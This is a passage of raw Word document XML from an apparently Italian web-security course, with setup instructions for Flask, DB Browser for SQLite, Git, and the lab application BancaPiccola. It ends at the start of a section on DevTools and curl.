        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Ciao, sono il mio primo sito!</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">visibile.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5669280" cy="3023616"/>
            <wp:docPr id="6" name="Picture 6"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="screenshot_06_browser_aperto_su_localhost_5000_con_il_messaggio_Ciao_sono.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5669280" cy="3023616"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Hai appena fatto girare la tua prima applicazione web.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Da qui in avanti, ogni applicazione web che vedremo nel corso funziona con lo stesso schema.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="50"/>
    <w:bookmarkStart w:id="51" w:name="spegnere-il-server"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Spegnere il server</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Per fermare il server web torna nel terminale dove gira Flask e premi:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl + C</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">(due tasti contemporaneamente). Vedrai apparire di nuovo il prompt: il server è spento.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="51"/>
    <w:bookmarkEnd w:id="52"/>
    <w:bookmarkStart w:id="55" w:name="installare-db-browser-for-sqlite"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="447" w:name="sec_0_9"/>
      <w:r>
        <w:t xml:space="preserve">0.9 Installare DB Browser for SQLite</w:t>
      </w:r>
      <w:bookmarkEnd w:id="447"/>
    </w:p>
    <w:bookmarkStart w:id="53" w:name="cosè-sqlite"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cos’è SQLite</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">SQLite</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è un database. La sua particolarità è che, a differenza di altri database (MySQL, PostgreSQL, SQL Server),</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">non ha bisogno di un programma server</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in esecuzione: tutto il database è contenuto in un singolo file</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.db</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">o</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.sqlite</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Questo lo rende ideale per la didattica: niente da installare, niente da configurare, copi il file, hai tutto.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L’applicazione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">BancaPiccola</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">userà SQLite, e in molti laboratori vorrai aprire il file del database per guardare cosa c’è dentro: utenti, password (mal hashate, in alcuni casi), fatture. Per farlo serve un programma con interfaccia grafica.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="53"/>
    <w:bookmarkStart w:id="54" w:name="installazione-1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Installazione</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1015"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vai a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId32">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:bCs/>
            <w:b/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">https://sqlitebrowser.org/dl/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1015"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Scarica la versione per il tuo sistema operativo (su Windows:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">DB Browser for SQLite - Standard installer for 64-bit Windows</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1015"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Installa con tutte le opzioni predefinite.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">📷</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Screenshot:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">finestra di DB Browser for SQLite aperta vuota, prima di aprire un database.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5669280" cy="3139909"/>
            <wp:docPr id="7" name="Picture 7"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="screenshot_07_finestra_di_DB_Browser_for_SQLite_aperta_vuota_prima_di_apri.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5669280" cy="3139909"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Più avanti aprirai il file</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">bancapiccola.db</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con doppio click sull’icona del programma e potrai navigare le tabelle come se fossero fogli Excel.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="54"/>
    <w:bookmarkEnd w:id="55"/>
    <w:bookmarkStart w:id="60" w:name="installare-git-e-scaricare-bancapiccola"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="448" w:name="sec_0_10"/>
      <w:r>
        <w:t xml:space="preserve">0.10 Installare Git e scaricare BancaPiccola</w:t>
      </w:r>
      <w:bookmarkEnd w:id="448"/>
    </w:p>
    <w:bookmarkStart w:id="56" w:name="cosè-git"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cos’è Git</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Git</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è uno strumento per tenere traccia di tutte le modifiche fatte a un progetto di codice nel tempo. Non lo useremo per programmare nel corso (lo studierai in altri moduli), ma ci serve per</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">scaricare</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">l’applicazione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">BancaPiccola</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dal repository pubblico del corso. Pensa a Git come a un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">cloud per il codice</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: lo userai praticamente per un solo comando,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">git clone</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, che è l’equivalente di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">scarica una cartella completa di codice</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="56"/>
    <w:bookmarkStart w:id="57" w:name="installazione-2"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Installazione</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Su Windows:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1. Vai a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId33">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:bCs/>
            <w:b/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">https://git-scm.com/download/win</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2. Il download parte automaticamente.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3. Apri il file</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e installa con tutte le impostazioni predefinite (sono tante schermate, premi sempre</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Next</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— i default vanno bene).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Su macOS:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Apri il terminale e digita</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">git --version</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Se Git non è installato, macOS ti proporrà di installare gli</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Strumenti da riga di comando di Xcode</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: accetta, attendi 5-10 minuti, e Git sarà a posto.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Verifica:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">apri un nuovo terminale e digita:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">git --version</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Devi vedere qualcosa tipo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">git version 2.4x.x</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="57"/>
    <w:bookmarkStart w:id="58" w:name="scaricare-bancapiccola"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Scaricare BancaPiccola</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">💡 L’URL esatto del repository ti verrà comunicato dal docente. Per ora useremo come segnaposto</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId34">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/ss4i/BancaPiccola.git</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nel terminale di VS Code (assicurati di essere nella cartella</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">corso-sicurezza</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— controlla con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pwd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">git clone </w:t>
      </w:r>
      <w:hyperlink r:id="rId34">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/ss4i/BancaPiccola.git</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Premi Invio. Git scaricherà tutta l’applicazione dentro una nuova sottocartella chiamata</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">BancaPiccola</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Vedrai apparire la cartella nella barra laterale di VS Code.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="58"/>
    <w:bookmarkStart w:id="59" w:name="avviare-bancapiccola"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Avviare BancaPiccola</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Entra nella cartella e installa le sue dipendenze:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cd BancaPiccola</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pip install -r requirements.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Spiegazione:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">requirements.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è un file di testo che elenca tutte le librerie Python di cui l’applicazione ha bisogno. Il comando</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pip install -r</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">le installa tutte in una volta sola nell’ambiente virtuale attivo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Poi avvia l’applicazione:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">python app.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Apri il browser su</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId31">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">http://127.0.0.1:5000</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">. Vedrai la pagina di login di BancaPiccola.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">📷</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Screenshot:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">la home page di BancaPiccola con il form di login.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5669280" cy="3307080"/>
            <wp:docPr id="8" name="Picture 8"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="screenshot_08_la_home_page_di_BancaPiccola_con_il_form_di_login.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5669280" cy="3307080"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le credenziali di test sono pubblicate nel file</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">README.md</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">della cartella (per esempio: utente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">mario</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/ password</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">mario</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Per ora limitati a esplorare: vedrai la pagina del conto, una lista di fatture, il profilo. Non c’è ancora niente di sicurezza qui: stai solo prendendo confidenza con l’applicazione che useremo per i laboratori.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Per fermare l’applicazione:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl + C</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">nel terminale.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="59"/>
    <w:bookmarkEnd w:id="60"/>
    <w:bookmarkStart w:id="63" w:name="Xb8552d8aec2643a9fdf5cffec368737b4b83542"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="449" w:name="sec_0_11"/>
      <w:r>
        <w:t xml:space="preserve">0.11 Strumenti per i laboratori: DevTools del browser e curl</w:t>
      </w:r>
      <w:bookmarkEnd w:id="449"/>
    </w:p>
    <w:bookmarkStart w:id="61" w:name="devtools-del-browser"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">DevTools del browser</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
